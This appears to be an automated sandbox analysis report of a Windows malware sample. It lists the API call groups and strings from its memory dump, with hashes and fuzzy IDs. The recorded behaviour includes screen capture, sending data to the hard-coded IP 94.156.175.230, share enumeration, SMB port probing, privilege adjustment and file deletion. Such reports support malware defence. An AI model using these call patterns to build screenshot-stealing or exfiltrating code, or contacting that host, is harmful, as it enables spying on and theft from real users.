                                                                    0x00e6e461
                                                                    0x00e6e464
                                                                    0x00e6e466
                                                                    0x00e6e46c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6e46c
                                                                    0x00e6e311
                                                                    0x00e6e4ae
                                                                    0x00e6e4ba
                                                                    0x00e6e4c9
                                                                    0x00e6e4cf
                                                                    0x00e6e4d2
                                                                    0x00e6e4dc
                                                                    0x00e6e4e4
                                                                    0x00e6e50a
                                                                    0x00e6e515
                                                                    0x00e6e51e
                                                                    0x00e6e524
                                                                    0x00e6e52b
                                                                    0x00e6e52d
                                                                    0x00e6e534
                                                                    0x00e6e53b
                                                                    0x00e6e542
                                                                    0x00e6e546
                                                                    0x00e6e54a
                                                                    0x00e6e54f
                                                                    0x00e6e56c
                                                                    0x00e6e56f
                                                                    0x00e6e551
                                                                    0x00e6e558
                                                                    0x00e6e55b
                                                                    0x00e6e55f
                                                                    0x00e6e55f
                                                                    0x00e6e577
                                                                    0x00e6e585
                                                                    0x00e6e58b
                                                                    0x00e6e596
                                                                    0x00e6e59c
                                                                    0x00e6e5a7
                                                                    0x00e6e5ad
                                                                    0x00e6e5b5
                                                                    0x00e6e5bb
                                                                    0x00e6e5be
                                                                    0x00e6e5c0
                                                                    0x00e6e5c6
                                                                    0x00e6e5cd
                                                                    0x00e6e5d4
                                                                    0x00e6e5db
                                                                    0x00e6e5de
                                                                    0x00e6e5e3
                                                                    0x00e6e5e7
                                                                    0x00e6e5f0
                                                                    0x00e6e5f5
                                                                    0x00e6e5f8
                                                                    0x00e6e5ff
                                                                    0x00000000
                                                                    0x00e6e5ff
                                                                    0x00e6e4e6
                                                                    0x00e6e4e9
                                                                    0x00e6e4f1
                                                                    0x00e6e4f8
                                                                    0x00000000
                                                                    0x00e6e4f8
                                                                    0x00000000
                                                                    0x00e6e491
                                                                    0x00e6e485
                                                                    0x00e6e493
                                                                    0x00e6e493
                                                                    0x00e6e496
                                                                    0x00e6e497
                                                                    0x00e6e49b
                                                                    0x00e6e49c
                                                                    0x00e6e4a0
                                                                    0x00e6e4a0
                                                                    0x00000000
                                                                    0x00e6e4a0

                                                                    APIs
                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000,A6ABE2D4), ref: 00E6E337
                                                                    • GetSystemMetrics.USER32 ref: 00E6E33F
                                                                    • GetSystemMetrics.USER32 ref: 00E6E34A
                                                                    • GetSystemMetrics.USER32 ref: 00E6E35A
                                                                    • GetSystemMetrics.USER32 ref: 00E6E365
                                                                    • GetDC.USER32(00000000), ref: 00E6E37A
                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00E6E384
                                                                    • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 00E6E393
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00E6E3A1
                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 00E6E3C5
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00E6E3CD
                                                                    • DeleteDC.GDI32(00000000), ref: 00E6E3D4
                                                                    • ReleaseDC.USER32 ref: 00E6E3DF
                                                                    • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 00E6E414
                                                                    • GdipGetImageHeight.GDIPLUS(00000000,00000000), ref: 00E6E43F
                                                                    • GdipGetImageWidth.GDIPLUS(00000000,?), ref: 00E6E459
                                                                    • GdipBitmapGetPixel.GDIPLUS(?,00000000,00000000,?), ref: 00E6E47B
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00E6E4BA
                                                                    • CLSIDFromString.OLE32({557cf401-1a04-11d3-9a73-0000f81ef32e},?), ref: 00E6E4C9
                                                                    • GdipSaveImageToStream.GDIPLUS(?,00000000,?,00000000), ref: 00E6E4DC
                                                                    • GdipDisposeImage.GDIPLUS(?), ref: 00E6E4F8
                                                                    • GetHGlobalFromStream.OLE32(00000000,?), ref: 00E6E515
                                                                    • GlobalSize.KERNEL32(00000000), ref: 00E6E51E
                                                                    • GlobalLock.KERNEL32 ref: 00E6E577
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00E6E596
                                                                    • DeleteObject.GDI32(?), ref: 00E6E5B5
                                                                    • Sleep.KERNELBASE(001B7740), ref: 00E6E609
                                                                    • GdipDisposeImage.GDIPLUS(?), ref: 00E6E620
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Gdip$GlobalImage$CreateMetricsSystem$BitmapFromObjectStream$CompatibleDeleteDisposeSelect$GdiplusHeightLockPixelReleaseSaveSizeSleepStartupStringUnlockWidth
                                                                    • String ID: sbyc${557cf401-1a04-11d3-9a73-0000f81ef32e}
                                                                    • API String ID: 2824885520-1348565962
                                                                    • Opcode ID: e85844a836a8aeeb1f3e5d5608a69c5d05caf1e6144136bc2ac61a33e64d7d33
                                                                    • Instruction ID: efb757d4fc0b9bf0b01c2bd6810b6a4f238478652a8a5ed9be0d4034a06d80b0
                                                                    • Opcode Fuzzy Hash: e85844a836a8aeeb1f3e5d5608a69c5d05caf1e6144136bc2ac61a33e64d7d33
                                                                    • Instruction Fuzzy Hash: 80A13571C04218EFDB109FA5DC49BEDBBB8FB08704F204129E505B72A1DB765A0ADFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00E8735A
                                                                    • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00E8738D
                                                                    • __Mtx_init_in_situ.LIBCPMT ref: 00E87631
                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00E87B1A
                                                                      • Part of subcall function 00E73630: std::locale::_Init.LIBCPMT ref: 00E736F5
                                                                      • Part of subcall function 00E73590: std::locale::_Init.LIBCPMT ref: 00E735B6
                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00E87E05
                                                                    • Sleep.KERNEL32(0000001E,?,?,00000001,?,?,?,00000003,00000003), ref: 00E887D7
                                                                    • CreateThread.KERNELBASE(00000000,00020000,Function_00038F10,00000000,00000000,00000000), ref: 00E8885C
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000003,00000003,?,?,?,?,?,?,?,?,00ED9B4C), ref: 00E88995
                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000003,00000003,?,?,?,?,?,?,?,?,00ED9B4C,000000B0), ref: 00E8899E
                                                                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00E88B20
                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00E88B80
                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00E88B8F
                                                                    • NetShareEnum.NETAPI32(?,00000001,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 00E88CA4
                                                                    • NetApiBufferFree.NETAPI32(00000000), ref: 00E88EB7
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E88EC0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AdaptersConcurrency::cancel_current_taskInfoInitIos_base_dtorstd::ios_base::_std::locale::_$BufferCloseCreateEnumFreeHandleMtx_destroy_in_situMtx_init_in_situMtx_unlockObjectShareSingleSleepThreadWait
                                                                    • String ID: 0.0.0.0$128$255$list too long
                                                                    • API String ID: 2357068564-3649073795
                                                                    • Opcode ID: cc562fd6761e70b83d00413a8dc376da18e536f7810ed4dea90696fca541bdf5
                                                                    • Instruction ID: fae79cbb2283483be9f19a8aec6c6df16b1c0b775a02aa47c716dd16dcfb7b82
                                                                    • Opcode Fuzzy Hash: cc562fd6761e70b83d00413a8dc376da18e536f7810ed4dea90696fca541bdf5
                                                                    • Instruction Fuzzy Hash: 8F0325B0D002688FDB25DF68C994BDDBBB8AB19304F5451E9E40CBB291DB759B84CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 00E6DE6D
                                                                    • inet_addr.WS2_32(94.156.175.230), ref: 00E6DE7A
                                                                    • htons.WS2_32(00000050), ref: 00E6DE8E
                                                                    • connect.WS2_32(00000000,?,00000010), ref: 00E6DE9F
                                                                    • setsockopt.WS2_32(00000000,0000FFFF,00001006,?,00000004), ref: 00E6DEC5
                                                                    • setsockopt.WS2_32(00000000,0000FFFF,00001005,0000EA60,00000004), ref: 00E6DEDC
                                                                    • send.WS2_32(00000000,?,?,00000000), ref: 00E6DEF4
                                                                    • send.WS2_32(00000000,00F29248,00000000), ref: 00E6DF17
                                                                    • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00E6E052
                                                                    • send.WS2_32(00000000,00000000,00000004,00000000), ref: 00E6E0EF
                                                                    • send.WS2_32(00000000,00000000,?,00000000), ref: 00E6E105
                                                                    • recv.WS2_32(00000000,?,00000005,00000008), ref: 00E6E114
                                                                    • closesocket.WS2_32(00000000), ref: 00E6E132
                                                                    • closesocket.WS2_32(00000000), ref: 00E6E16D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: send$closesocketsetsockopt$connecthtonsinet_addrrecvsocket
                                                                    • String ID: 94.156.175.230$saved
                                                                    • API String ID: 1790073436-4207706820
                                                                    • Opcode ID: 391b04c8a10f8c730c566a2e2db1af2bfa0584d376e39d17fd0a795f84ab977f
                                                                    • Instruction ID: 6992be5af76a57ede0f756d7066239a25b5a861ee030128b691543febaaa077c
                                                                    • Opcode Fuzzy Hash: 391b04c8a10f8c730c566a2e2db1af2bfa0584d376e39d17fd0a795f84ab977f
                                                                    • Instruction Fuzzy Hash: 10B15570A05259EFDB00CFA5DC94BEEBBF4EF15300F544029E405BB292C775AA4ACBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateFileA.KERNELBASE(00000000,80000000,00000000,00000000,00000004,00000080,00000000,?,?,00EE3B80,?,00000000,00EE3B80,?,?), ref: 00E83F67
                                                                    • NtQuerySystemInformation.NTDLL(?,?,?,00EE3B80), ref: 00E83FC8
                                                                    • FindCloseChangeNotification.KERNELBASE(00EE3B80,?,?,?,?,?,?,00EE3B80,?,00000000,00EE3B80), ref: 00E8404C
                                                                    • DeleteFileA.KERNELBASE(00000000,?,?,?,?,?,?,00EE3B80,?,00000000,00EE3B80), ref: 00E84056
                                                                    • CloseHandle.KERNEL32(00EE3B80,?,?,?,?,?,00EE3B80,?,00000000,00EE3B80), ref: 00E8407C
                                                                    • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,00EE3B80,?,00000000,00EE3B80), ref: 00E84086
                                                                    Strings
                                                                    • excpetion at sepcifing fh index 1, xrefs: 00E8406F
                                                                    • excpetion at sepcifing fh index, xrefs: 00E840A8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$CloseDelete$ChangeCreateFindHandleInformationNotificationQuerySystem
                                                                    • String ID: excpetion at sepcifing fh index$excpetion at sepcifing fh index 1
                                                                    • API String ID: 1315666145-3318450557
                                                                    • Opcode ID: ed37bf2a9971a0c83c3d74aa0b451ea649534e94e5e4ddb8bb8017d6cc5a8ccb
                                                                    • Instruction ID: 37b571de60a694225621ee05e74426b0d001113fce9a95ad7b2db99ef75e2e5c
                                                                    • Opcode Fuzzy Hash: ed37bf2a9971a0c83c3d74aa0b451ea649534e94e5e4ddb8bb8017d6cc5a8ccb
                                                                    • Instruction Fuzzy Hash: 6C4129B1E0020A9FDB10EBA5DC46BBEB7F5EF48315F141079EA0DB7281DB3659058B91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000020,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,\\?\), ref: 00E86E99
                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,\\?\), ref: 00E86EA0
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00EDA42C,?), ref: 00E86EB1
                                                                    • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000), ref: 00E86EE4
                                                                    • CloseHandle.KERNEL32(?), ref: 00E86EF1
                                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 00E86F08
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseProcessToken$AdjustChangeCurrentFindHandleLookupNotificationOpenPrivilegePrivilegesValue
                                                                    • String ID:
                                                                    • API String ID: 1649481349-0
                                                                    • Opcode ID: 2b4a617b555652996acd78a4d5b31e32a522a31b0a2f470df29bcf4988c2d8e9
                                                                    • Instruction ID: 0ff0a7b977645697551664a3fb7527cb1076469f837813fd4512007884c65100
                                                                    • Opcode Fuzzy Hash: 2b4a617b555652996acd78a4d5b31e32a522a31b0a2f470df29bcf4988c2d8e9
                                                                    • Instruction Fuzzy Hash: 66111275A05208AFDF10DFA5DC49FEEB7B8EB08704F000179F905B6280DB769A05DB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(0000001D,?,00000004,00000000,?,00E5EA5B,00000000), ref: 00E86E52
                                                                    • NtSetInformationProcess.NTDLL(?,00E5EA5B,00000000), ref: 00E86E61
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Process$CurrentInformation
                                                                    • String ID:
                                                                    • API String ID: 2491907881-0
                                                                    • Opcode ID: 6e020dc6dcaf6ca7f9909b164b07cf41edbfff38aeff9b3b2b1da43c69e2ad54
                                                                    • Instruction ID: 840b8b5a2e78ad1eeee977f4912cfe9129ab32eb790de1d25fb2cc416634353c
                                                                    • Opcode Fuzzy Hash: 6e020dc6dcaf6ca7f9909b164b07cf41edbfff38aeff9b3b2b1da43c69e2ad54
                                                                    • Instruction Fuzzy Hash: 68E09B71E0410CAFC700EF699C41AADB7BCDB08610F4001B6E505A7280CA7159054B81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2722cb9adeacda2b8210e9a41113489339a2f07b59c7d9bdb7d1e0522dadf8d0
                                                                    • Instruction ID: 1d280b97f1c79818792920bf184d5b5b8de4cbb07edc63fcd1ce532c9e9345c1
                                                                    • Opcode Fuzzy Hash: 2722cb9adeacda2b8210e9a41113489339a2f07b59c7d9bdb7d1e0522dadf8d0
                                                                    • Instruction Fuzzy Hash: 17F0A072614624DFCB22C748E805BDAB3A8EB44B95F511066F540F7251C3B0DD00C7C0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 00E8715D
                                                                    • inet_addr.WS2_32 ref: 00E87170
                                                                    • htons.WS2_32(000001BD), ref: 00E8717F
                                                                    • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00E8719B
                                                                    • connect.WS2_32(00000000,00000010,00000010), ref: 00E871A9
                                                                    • select.WS2_32(00000000,00000001,00000001,00000001,00000004), ref: 00E871EE
                                                                    • closesocket.WS2_32(00000000), ref: 00E871FA
                                                                    • closesocket.WS2_32(00000000), ref: 00E87209
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: closesocket$connecthtonsinet_addrioctlsocketselectsocket
                                                                    • String ID:
                                                                    • API String ID: 739720401-0
                                                                    • Opcode ID: c0a02ddad7bb74232f352a7adc30c0ce7ea5089cbb69f3e8eed26daaca587c3d
                                                                    • Instruction ID: b0124d3c659d677f6de938355a91da15aa84ed5bbd6a30cbc4ec209484191575
                                                                    • Opcode Fuzzy Hash: c0a02ddad7bb74232f352a7adc30c0ce7ea5089cbb69f3e8eed26daaca587c3d
                                                                    • Instruction Fuzzy Hash: B4316BB1C06208AFDB14DFA5DC45FEEBBB8EF04704F10412AF505B6290DBB69949CB65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 0-537541572
                                                                    • Opcode ID: 9c52884cf51145ba8d4760cc35d48d23ab5bd61f691a3157c0fb4c310b11fe71
                                                                    • Instruction ID: 2cc2e480cd656cc306e64af7fb301efe4a2706d0940558f6f0103814f8d0370e
                                                                    • Opcode Fuzzy Hash: 9c52884cf51145ba8d4760cc35d48d23ab5bd61f691a3157c0fb4c310b11fe71
                                                                    • Instruction Fuzzy Hash: 8021A833A05B15ABCB228B659C81FDB7B549B417A4F292521EC46B7291D631EC01CAE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • Wow64DisableWow64FsRedirection.KERNEL32(?,A6ABE2D4,?,00000000), ref: 00E5A370
                                                                    • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000010,00000000,?,00000044,?), ref: 00E5A396
                                                                    • Wow64RevertWow64FsRedirection.KERNEL32(?,?,00000000), ref: 00E5A3A2
                                                                    • CloseHandle.KERNEL32(?,?,00000000), ref: 00E5A3AE
                                                                    • CloseHandle.KERNEL32(?,?,00000000), ref: 00E5A3BA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Wow64$CloseHandleRedirection$CreateDisableProcessRevert
                                                                    • String ID:
                                                                    • API String ID: 680949609-0
                                                                    • Opcode ID: 41cd43c7ff01e55e278c24af96145130687dd095bcbdec7d087814eddf10bbf4
                                                                    • Instruction ID: 372bf1544ae61bd1a0c41d320f404d3045919ee0002f19e5399c7311839d3402
                                                                    • Opcode Fuzzy Hash: 41cd43c7ff01e55e278c24af96145130687dd095bcbdec7d087814eddf10bbf4
                                                                    • Instruction Fuzzy Hash: 08B13471C146A8CADB20CF64CD45BDDBBB0BF59308F1092D9D85977292EBB41A88CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • WSAStartup.WS2_32(00000202,?), ref: 00E8701C
                                                                    • WriteFile.KERNEL32(00000000,-00000002,00000000,00000000,?,00F2C0CC), ref: 00E870C6
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E870DE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileMtx_unlockStartupWrite
                                                                    • String ID: ild
                                                                    • API String ID: 3902326042-1003530327
                                                                    • Opcode ID: 68b8e103d673d2e5fc8d8dba0c980ca6284144dbbaf47325a334f4029f79883e
                                                                    • Instruction ID: 09c08b9f5b541e73df8fbae584ed56aeaa2b16d7c0c663dc198ff070673a2314
                                                                    • Opcode Fuzzy Hash: 68b8e103d673d2e5fc8d8dba0c980ca6284144dbbaf47325a334f4029f79883e
                                                                    • Instruction Fuzzy Hash: 18315771909749DFD720DF64DC46BAAB7E8FB09300F045269ED89A73E1E730AA04C791
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000,A6ABE2D4,00000001,00000001), ref: 00E5EACF
                                                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00E5EAE3
                                                                    • ReadFile.KERNEL32(00000000,?,00000006,00000008,00000000), ref: 00E5EB09
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E5EB1D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleReadSize
                                                                    • String ID:
                                                                    • API String ID: 3919263394-0
                                                                    • Opcode ID: 01c50cf87d89975a47019e30268070c36a78c918f96c31a8c2d12f1cae53cb48
                                                                    • Instruction ID: 349bd8a5ac53f3be001a09b11caf431ff0e376cd5d0c11a1b4ce7666059b74ba
                                                                    • Opcode Fuzzy Hash: 01c50cf87d89975a47019e30268070c36a78c918f96c31a8c2d12f1cae53cb48
                                                                    • Instruction Fuzzy Hash: 3A213D71904208EFDB24DF55CC45FEEB7B8EB44721F104229E911B62C0D7756A49CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000,A6ABE2D4,00000001), ref: 00E5EBAF
                                                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00E5EBC3
                                                                    • ReadFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00E5EBE9
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E5EBF6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleReadSize
                                                                    • String ID:
                                                                    • API String ID: 3919263394-0
                                                                    • Opcode ID: 9b30fe1dcbaf85fdfd0630d47c531afc2823990d5aea52e60b58c1590db4b843
